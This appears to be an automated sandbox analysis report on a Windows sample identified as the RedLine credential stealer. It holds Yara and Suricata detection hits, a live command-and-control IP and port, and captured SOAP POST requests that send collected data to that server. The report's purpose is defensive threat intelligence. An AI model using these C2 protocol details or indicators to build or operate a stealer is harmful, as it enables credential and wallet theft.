Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1505135
MD5:	6a94b94ba557d5d85a1da20213d48974
SHA1:	a311aa3a9243849b883867fa3d772e4c4e95d080
SHA256:	e4a125aa374a939c07ee3172dd5cdb23990096efe7059e9d647f1eaadc32e3dd
Tags:	exe
Infos:

Detection

RedLine

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected RedLine Stealer

AI detected suspicious sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6A94B94BA557D5D85A1DA20213D48974)

WerFault.exe (PID: 6336 cmdline: C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x19788:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1ccbe:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1f7d8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x22d0e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xf0b8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x125ee:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: file.exe PID: 7056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7056	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:20.137045+0200	2045000	1	Malware Command and Control Activity Detected	91.92.253.107	1334	192.168.2.4	49730	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:29.302629+0200	2046056	1	A Network Trojan was detected	91.92.253.107	1334	192.168.2.4	49730	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:29.302629+0200	2045001	1	Malware Command and Control Activity Detected	91.92.253.107	1334	192.168.2.4	49730	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:15.140795+0200	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49730	91.92.253.107	1334	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:20.343929+0200	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49730	91.92.253.107	1334	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:31.583999+0200	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49733	91.92.253.107	1334	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-05T20:25:29.711888+0200	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49732	91.92.253.107	1334	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.pdb` source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdbp source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Net.Http.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Core.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Runtime.Serialization.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb3X2 source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.pdb0 source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
Source:	Binary string: System.ServiceModel.ni.pdb source: WERB6FD.tmp.dmp.4.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49730 -> 91.92.253.107:1334
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 91.92.253.107:1334 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49730 -> 91.92.253.107:1334
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 91.92.253.107:1334 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 91.92.253.107:1334 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49733 -> 91.92.253.107:1334
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49732 -> 91.92.253.107:1334

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 1334
Source: unknown	Network traffic detected: HTTP traffic on port 1334 -> 49733

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 91.92.253.107:1334

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 91.92.253.107:1334Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 91.92.253.107:1334Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 91.92.253.107:1334Content-Length: 955746Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 91.92.253.107:1334Content-Length: 955738Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: THEZONEBG THEZONEBG

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.107

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 91.92.253.107:1334Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.1
Source: file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.107:1334
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.107:1334/
Source: file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.107:13342b
Source: file.exe, 00000000.00000002.1956078575.000001D60B499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0v
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: file.exe, 00000000.00000002.1956078575.000001D60B612000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1956078575.000001D60B47E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnv
Source: file.exe, 00000000.00000002.1956078575.000001D60B620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: file.exe, 00000000.00000002.1956078575.000001D60B3D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: file.exe, 00000000.00000002.1956078575.000001D60B44A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1735599246.000001D61B635000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B6E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B583000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1736302201.000001D624198000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B68E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1735599246.000001D61B5DC000.00000004.00000800.00020000.00000000.sdmp, tmp1AE8.tmp.0.dr, tmp529A.tmp.0.dr, tmp52AB.tmp.0.dr, tmp5288.tmp.0.dr, tmp5299.tmp.0.dr, tmp5257.tmp.0.dr, tmp89E9.tmp.0.dr, tmp89B9.tmp.0.dr, tmp1B29.tmp.0.dr, tmp1B19.tmp.0.dr, tmp1B08.tmp.0.dr, tmp5268.tmp.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
